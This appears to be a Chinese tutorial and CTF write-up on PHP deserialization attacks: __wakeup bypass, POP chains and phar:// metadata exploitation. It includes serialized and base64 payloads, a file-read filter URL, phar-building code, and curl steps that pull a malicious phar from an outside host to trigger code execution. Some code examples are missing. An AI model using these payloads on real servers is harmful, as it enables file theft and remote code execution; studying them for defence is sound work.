自从 Orange 在 2017年的 hitcon 出了一个 0day 的 php phar:// 反序列化给整个安全界开启了新世界的大门以后，php 反序列化这个漏洞就逐渐升温，没想到后来 2018 年 blackhat 的议题上这个问题再次被提及，利用的还是 Orange 的思路(我只能 orz),到现在 phar:// 反序列化已经成为了各大 CTF 炙手可热的思路，就仿佛 2016 年的 CVE-2016-7124 绕过 __weakup 一样。

这其实是为了解决 PHP 对象传递的一个问题,因为 PHP 文件在执行结束以后就会将对象销毁，那么如果下次有一个页面恰好要用到刚刚销毁的对象就会束手无策，总不能你永远不让它销毁，等着你吧，于是人们就想出了一种能长久保存对象的方法，这就是 PHP 的序列化，那当我们下次要用的时候只要反序列化一下就 ok 啦

序列化的目的是方便数据的传输和存储. json 是为了传递数据的方便性.

序列化示例：

关键函数 serialize():将PHP中创建的对象，变成一个字符串

private属性序列化的时候格式是 %00类名%00成员名

protected属性序列化的时候格式是 %00*%00成员名

关键要点：

在Private 权限私有属性序列化的时候格式是 %00类名%00属性名

在Protected 权限序列化的时候格式是 %00*%00属性名

你可能会发现这样一个问题，你这个类定义了那么多方法，怎么把对象序列化了以后全都丢了？你看你整个序列化的字符串里面全是属性，就没有一个方法，这是为啥？

(1)我们在反序列化的时候一定要保证在当前的作用域环境下有该类存在

这里不得不扯出反序列化的问题，这里先简单说一下，反序列化就是将我们压缩格式化的对象还原成初始状态的过程（可以认为是解压缩的过程），因为我们没有序列化方法，因此在反序列化以后我们如果想正常使用这个对象的话我们必须要依托于这个类要在当前作用域存在的条件。

(2)我们在反序列化攻击的时候也就是依托类属性进行攻击

因为没有序列化方法嘛，我们能控制的只有类的属性，因此类属性就是我们唯一的攻击入口，在我们的攻击流程中，我们就是要寻找合适的能被我们控制的属性，然后利用它本身的存在的方法，在基于属性被控制的情况下发动我们的发序列化攻击（这是我们攻击的核心思想，这里先借此机会抛出来，大家有一个印象）

图片1

反序列化示例：

图片2

关键函数 unserialize():将经过序列化的字符串转换回PHP值

当有 protected 和 private 属性的时候记得补齐空的字符串

__wakeup()魔术方法

unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在，则会先调用 __wakeup 方法，预先准备对象需要的资源。

序列化public private protect参数产生不同结果

test类定义了三个不同类型(私有，公有，保护)但是值相同的字符串，序列化输出的值不相同 O:4:"test":3:{s:11:" test test1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:" * test3";s:5:"hello";}

通过对网页抓取输出是这样的 O:4:"test":3:{s:11:"\00test\00test1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:"\00*\00test3";s:5:"hello";}

private的参数被反序列化后变成 \00test\00test1 public的参数变成 test2 protected的参数变成 \00*\00test3

PHP 反序列化漏洞又叫做 PHP 对象注入漏洞，是因为程序对输入数据处理不当导致的.

反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控，从上面的例子看，这个函数的参数是一个序列化的对象，而序列化的对象只含有对象的属性，那我们就要利用对对象属性的篡改实现最终的攻击。

PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法。所以在定义类方法时，除了上述魔术方法，建议不要以 __ 为前缀。 常见的魔法方法如下：

(1) __construct()：当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。 (2) __wakeup() ：unserialize()时会自动调用 (3) __destruct()：当对象被销毁时会自动调用。 (4) __toString():当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用 (5) __get() :当从不可访问的属性读取数据 (6) __call(): 在对象上下文中调用不可访问的方法时触发

其中特别说明一下第四点：

这个 __toString 触发的条件比较多，也因为这个原因容易被忽略，常见的触发条件有下面几种

在我们的攻击中，反序列化函数 unserialize() 是我们攻击的入口，也就是说，只要这个参数可控，我们就能传入任何的已经序列化的对象（只要这个类在当前作用域存在我们就可以利用），而不是局限于出现 unserialize() 函数的类的对象，如果只能局限于当前类，那我们的攻击面也太狭小了，这个类不调用危险的方法我们就没法发起攻击。

但是我们又知道，你反序列化了其他的类对象以后我们只是控制了是属性，如果你没有在完成反序列化后的代码中调用其他类对象的方法，我们还是束手无策，毕竟代码是人家写的，人家本身就是要反序列化后调用该类的某个安全的方法，你总不能改人家的代码吧，但是没关系，因为我们有魔法方法。

魔法正如上面介绍的，魔法方法的调用是在该类序列化或者反序列化的同时自动完成的，不需要人工干预，这就非常符合我们的想法，因此只要魔法方法中出现了一些我们能利用的函数，我们就能通过反序列化中对其对象属性的操控来实现对这些函数的操控，进而达到我们发动攻击的目的。

示例程序：

满足反序列化漏洞条件：存在unserialize() 函数，函数参数$a可以控制，就具备了利用反序列化漏洞的前提。因为存在 echo 的原因，我们还可以直接利用xss

图片3

图片4

我们一样是来写一个代码进行验证：

class test {

我们可以看到调用的顺序为：

构造方法 => set方法（我们此时为类中并没有定义过的一个类属性进行赋值触发了set方法） => get方法 => isset方法 => unset方法 => isset方法 => 析构方法

同时也可以发现，析构方法在所有的代码被执行结束之后进行的。 __call() __callStatic()

实例程序：

解题思路：考察的包含3个知识点

a、 PHP://input 作为文件读入

b、 PHP文件包含漏洞（php://filter/read=convert.base64-encode/resource=）

c、 PHP反序列化漏洞利用

只需要控制 $this->file 就能读到我们想要的文件

漏洞影响版本

PHP5 < 5.6.25

PHP7 < 7.0.10

漏洞原理及要点

__wakeup()函数触发于unserilize()调用之前，但是如果被反序列话的字符串其中对应的对象的属性个数发生变化时，会导致反序列化失败而同时使得 __wakeup()函数失效。当成员属性数目大于实际数目时会跳过 __wakeup()函数的执行。

实例演示：sugarcrm 5、第12届2019年全国大学生信息安全竞赛-Web之JustSoso

解题思路：

a、 http://xxx/index.php?file=php://filter/read/convert.base64-encode/resource=index(hint).php

b、parse_url() 函数解析漏洞 使用域名之后使用///

parse_url()会把//认为是相对路径（5.4.7以前） ///会被返回false 从而绕过过滤

c、hint.php 中的对象在反序列化的时候，会先调用 __wakeup 魔术方法，PHP反序列化绕过__wakeup方法（PHP-Bug-72663），

将我们payload中O:6:"Handle":1改为O:6:"Handle":2

d、使用引用，使token为token_flag的引用,从而 token===token_flag

要让token===token_flag，我们可以使用引用，使token变为token_flag的引用

找到一个正解，使用php得引用赋值来绕过。

原理： a=1; b=&a; a=a+1; 那末最后b得值也会变为2，因为b是引用赋值。

这里我们同样得方法，我们在构造序列化字符串得时候加上这么一句：

$b = new Flag("flag.php");

$b->token=&$b->token_flag;

$a = new Handle($b);

那末token得值就始终和token_flag保持一致了。

e、还有一点要注意：s:14:"Handlehandle" 为什么长度是12，前面的值却是14呢？

这是因为当成员属性为private时，在序列化后，Handle字串前后会各有一个0x00，因此长度为14。

类似的protect属性，则是在*前后各有一个0x00。

0x00的url编码为%00，因此我们传参时要进行编码。因此最终payload要加上%00。

题目地址：http://117.51.158.44/index.php

解题思路：

a、 抓包分析可以看到有个明显的header头didictf_username，使用burpSuite发送到Repeater didictf_username加入admin 发送后得到app/fL2XID2i0Cdh.php

b、 POST /app/Session.php 获得到Cookie值.

c、 源码分析:

修改 Content-Type:application/x-www-form-urlencoded,添加 nickname 变量中包含%s，加入获取的Cookie值，可得到$this->eancrykey的数值.

d、构造最终payload为

解题思路：

首先是一个类sercet 接受$cmd，绕过正则 ，反序列化。覆盖$file的值，绕过 __wakeup，显示the_next.php的源码

O:6:"sercet":1:{s:12:"sercetfile";s:12:"the_next.php";}

POC1: TzorNjoic2VyY2V0IjozOntzOjEyOiIAc2VyY2V0AGZpbGUiO3M6MTI6InRoZV9uZXh0LnBocCI7fQ==

在复现的过程中 我发现在hackbar中直接将 O:+6:"sercet":1:{s:12:" sercet file";s:12:"the_next.php";} base64编码不能绕过 必须要在本地base64_encode生成 才能复现成功

绕过正则可以用+号 问题是如何绕过__weakup函数 发现这是一个CVE漏洞 ==》当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)

O:6:"sercet":1: 也就是输入比1大的值就行 如O:6:"sercet":2:

O:6:"sercet":2:{s:12:"sercetfile";s:12:"the_next.php";}

所以POC2: O:+6:"sercet":2:{S:12:"\00sercet\00file";s:12:"the_next.php";} TzorNjoic2VyY2V0IjoyOntTOjEyOiJcMDBzZXJjZXRcMDBmaWxlIjtzOjEyOiJ0aGVfbmV4dC5waHAiO30KCgo=

两个POC均可以成功绕过.

这个 bug 的原理是：当反序列化字符串中，表示属性个数的值大于真实属性个数时，会跳过 __wakeup 函数的执行。

反序列化的字符串用户可控，但是反序列化后会先执行 __wakeup 函数，该函数会将 $this->file 变量设成固定值，导致我们无法进行任意文件读取。现在我们利用这个 bug 尝试绕过 __wakeup 函数。可以看到 ReadFile 类的属性中，只有一个 $file 私有属性，那么正常反序列化出来应该是下面这个样子：

而如果我们将数值个数值 1 改成大于 1 的任何数字，在反序列化时就不会调用 __wakeup 函数。观察上图，我们还会发现反序列化字符串中存在 \x00 字符，这个其实是类的私有属性反序列化后的格式，protected 属性也有自己的反序列化格式，不妨来看看：

回到题目上，我们最终可以用如下 payload ，实现绕过 __wakeup 函数读取任意文件：

ROP 的全称是面向返回编程(Return-Oriented Programing),ROP 链构造中是寻找当前系统环境中或者内存环境里已经存在的、具有固定地址且带有返回操作的指令集,将这些本来无害的片段拼接起来，形成一个连续的层层递进的调用链，最终达到我们的执行 libc 中函数或者是 systemcall 的目的

POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用链的方法，与二进制利用中的面向返回编程（Return-Oriented Programing）的原理相似，都是从现有运行环境中寻找一系列的代码或者指令调用，然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的

说的再具体一点就是 ROP 是通过栈溢出实现控制指令的执行流程，而我们的反序列化是通过控制对象的属性从而实现控制程序的执行流程，进而达成利用本身无害的代码进行有害操作的目的

说了这么多理论了，来点实战性的东西演示一下 POP 链的形成吧！

现在我们就按照，我上面说的步骤来一步一步的分析这段代码，最终构造我们的 POP 链完成利用

(1)寻找 unserialize() 函数的参数是否有我们的可控点

我们假设已经在第一段代码里设置了参数可控的 unserialize()

(2)寻找我们的反序列化的目标，重点寻找 存在 wakeup() 或 destruct() 魔法函数的类

我们在第一段代码中寻找，我们发现一眼就看到了我们最想要看到的东西，__destruct() 魔法方法，好，既然这样我们就将这个类作为我们的漏洞嫌疑对象

(3)一层一层地研究该类在魔法方法中使用的属性和属性调用的方法，看看是否有可控的属性能实现在当前调用的过程中触发的

1.我们就先来看一下这个 $write ，这个 $write 虽然不是属性，但是他是我们 $_write 属性的其中一部分，那么控制他也就等于控制属性，那我们就要好好研究一下这个 $write 了，他是什么呢？通过他能调用 shutdown() 来看,他是某一个类的一个对象，因为他不是单纯的属性所以我们还要向下挖

2.于是我们就要找一下定义 shutdown() 方法的类，然后我们就锁定了 Zend_Log_Writer_Mail 这个类，我们看到这个类里面使用了 $write 对象的很多属性，比如说 _layout ，然后我们又发现这个属性也调用了一个方法 render() ，说明这个属性其实也是一个对象，于是我们还要向更深处挖掘

3.那么 _layout 是谁的对象呢？我们发现他是 Zend_layout 的一个对象，同样的，他里面是用了一个 _inflector 的属性，这个属性调用了 filter 方法，看来他也是一个对象（有完没完~~）别急，我们继续向下

4.我们发现 _inflector 是 Zend_Filter_PregReplace 的一个对象，这个对象的一些属性是能进行直接控制的，并且在调用 filter 方法的时候能直接触发 preg_replace() 方法，太好了这正是我们想要的，我们只要控制这个对象的属性就能实现我们的利用链

最后一张 图片实际上已经将整个利用链画了出来，并且给上了 payload ，下面我想通过对整个 payload 的分析再来回顾一下整个 POP 链的调用过程.

所以整个 POP 链就是

writer->shutdown()->render()->filter()->preg_replace(我们控制的属性)->代码执行

在 2017 年的 hitcon Orange 的一道 0day 题的解法令人震惊，Orange 通过他对底层的深度理解，为 PHP 反序列化开启了新的篇章，在此之后的 black 2018 演讲者同样用这个话题讲述了 phar:// 协议在 PHP 反序列化中的神奇利用，那么接下来就让我们分析他为什么开启了 PHP 反序列化的新世界,以及剖析一下这个他的利用方法。 1.回顾一下原先 PHP 反序列化攻击的必要条件

(1)首先我们必须有 unserailize() 函数

(2)unserailize() 函数的参数必须可控

这两个是原先存在 PHP 反序列化漏洞的必要条件，没有这两个条件你谈都不要谈，根本不可能，但是从2017 年开始 Orange 告诉我们是可以的

2.phar:// 如何扩展反序列化的攻击面的

原来 phar 文件包在 生成时会以序列化的形式存储用户自定义的 meta-data ，配合 phar:// 我们就能在文件系统函数 file_exists() is_dir() 等参数可控的情况下实现自动的反序列化操作，于是我们就能通过构造精心设计的 phar 包在没有 unserailize() 的情况下实现反序列化攻击，从而将 PHP 反序列化漏洞的触发条件大大拓宽了，降低了我们 PHP 反序列化的攻击起点。

3.具体解释一下 phar 的使用 1.Phar 的文件结构

phar 文件最核心也是必须要有的部分如图所示： phar-1.png

(1) a stub

图片中说了，这其实就是一个PHP 文件实际上我们能将其复杂化为下面这个样子

格式为:

xxx

前面内容不限，但必须以__HALT_COMPILER();?>来结尾，这部分的目的就是让 phar 扩展识别这是一个标准的 phar 文件

(2）a manifest describing the contents

因为 Phar 本身就是一个压缩文件，它里面存储着其中每个被压缩文件的权限、属性等信息。这部分还会以序列化的形式存储用户自定义的meta-data，这是上述攻击手法最核心的地方。

(3)the file contents

这部分就是我们想要压缩在 phar 压缩包内部的文件

2.如何创建一个合法的 Phar压缩文件 http://127.0.0.1/php_unserialize/Phar-1.php

可以清楚地看到我们的 TestObject 类已经以序列化的形式存入文件中

我们刚刚说过了，php一大部分的文件系统函数在通过phar://伪协议解析phar文件时，都会将meta-data进行反序列化

测试后受影响的函数如下： 受影响的函数列表

fileatime filectime file_exists file_get_contents

file_put_contents file filegroup fopen

fileinode filemtime fileowner fikeperms

is_dir is_executable is_file is_link

is_readable is_writable is_writeable parse_ini_file

copy unlink stat readfile

3.phar 反序列化小实验

可以看出我们成功的在没有 unserailize() 函数的情况下，通过精心构造的 phar 文件，再结合 phar:// 协议，配合文件系统函数，实现了一次精彩的反序列化操作。

其他函数当然也是可行的：

phar_test2.php

当文件系统函数的参数可控时，我们可以在不调用unserialize()的情况下进行反序列化操作，一些之前看起来“人畜无害”的函数也变得“暗藏杀机”，极大的拓展了攻击面。

实际利用 3.1 利用条件

任何漏洞或攻击手法不能实际利用，都是纸上谈兵。在利用之前，先来看一下这种攻击的利用条件。

具体参考:利用 phar 拓展 php 反序列化漏洞攻击面 https://paper.seebug.org/680/

HITCON 2016上，orange 出了一道PHP反序列化。 babytrick HITCON 2017上，orange 出了一道Phar + PHP反序列化。 下面的实例程序 HITCON 2018上，orange 出了一道file_get_contents + Phar + PHP反序列化。 Hitcon2018 BabyCake题目分析 https://www.anquanke.com/post/id/162431#h2-0 让我们期待HITCON 2019的操作

通过源码分析，很清楚 cookie 是通过 remote_addr 配合 sha1 进行 hmac 签名生成的，想绕过他那是不可能的，当时的人们肯定都是沉迷于无法绕过这个，于是最终这道题是 全球 0 解，但是现在我们就要思考一下 是不是能用 Phar 这个在不使用 unserialize() 的方式完成序列化成功 get flag

回顾一下使用 Phar 反序列化的条件是什么

(1)文件上传点 (2)系统文件函数 (3) phar:// 伪协议

这个太完美了，完全符合我们要求，我们只要的精心构造一个包含 Admin 对象、包含 avatar.gif 文件，并且 stub 是 GIF89a 的 phar 文件然后上传上去，下一次请求通过 Phar:// 协议让 file_get_contents 请求这个文件就可以实现我们对 Admin 对象的反序列化了(有人可能会说为什么不直接用 phar:// 请求远程文件，因为phar:// 不支持访问远程 URL )

生成 phar 的 paylod

$p->setMetadata(new Admin()); $p->setStub('GIF89a'); rename(DIR . '/avatar.phar', DIR . '/avatar.gif'); ?>

这里还有一个点需要提一下(虽然和反序列化没什么直接关系)，就是我们通过 eval 创建的函数并不能帮我们拿到 flag 因为他是随机名称的，我们是无法预测的，实际上这是 Orange 的一个障眼法，我们真正要利用的是 eval 下面的 $_GET"lucky";

但是实际上我们的 $FLAG 也是一个匿名函数，但是匿名函数就真的没有名字了吗？非也，匿名函数的函数名被定义为

\000_lambda_" . count(anonymous_functions)++;

这里的count 会一直递增到最大长度直到结束，这里我们可以通过大量的请求来迫使Pre-fork模式启动的Apache启动新的线程，这样这里的随机数会刷新为1，就可以预测了

下面给出 Orange 的解题过程

# get a cookie $ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif $ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process $ python fork.py &

# get flag $ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=lambda_1"

php里面的类-----class XX{}，通过类的定义，可以使用调用类里面的成员属性和成员方法。

对象---一个类就是一个对象，一个对象可以有多个属性，一个类可以有多个成员方法。

在PHP中，要创建一个类很简单，只需要关键字class即可，class {}

在PHP中用关键字new来创建一个类的对象，其语法如下：

$object_name=new class_name

其中，object_name即为所要建立的对象的名字，关键字new用来创建一个对象，class_name为类名。

在类中定义的变量我们称之为“属性（property）”，属性的声明必须由访问控制关键字public（公开的）、protected（受保护的）或private（私有的）开头。

public属性可以在类的外部访问，而protected和private属性则只能由该类内部的方法使用。

外部访问对象的属性和方法时，使用 -> 操作符。内部访问时使用$this（伪变量）调用当前对象的属性或方法。

类中的方法（function）和属性具有一样的访问控制方式。定义方法时加上public、protected和private关键字即可。默认状态下为public。同样的，public可通过->操作符外部访问，而protected和private方法只能通过为变量$this内部访问。

protected和private都不可外部访问，区别在哪里呢？

从字面理解，protected只是受保护而已，所有可以在本类、父类和子类中访问。而private只能在本类中访问。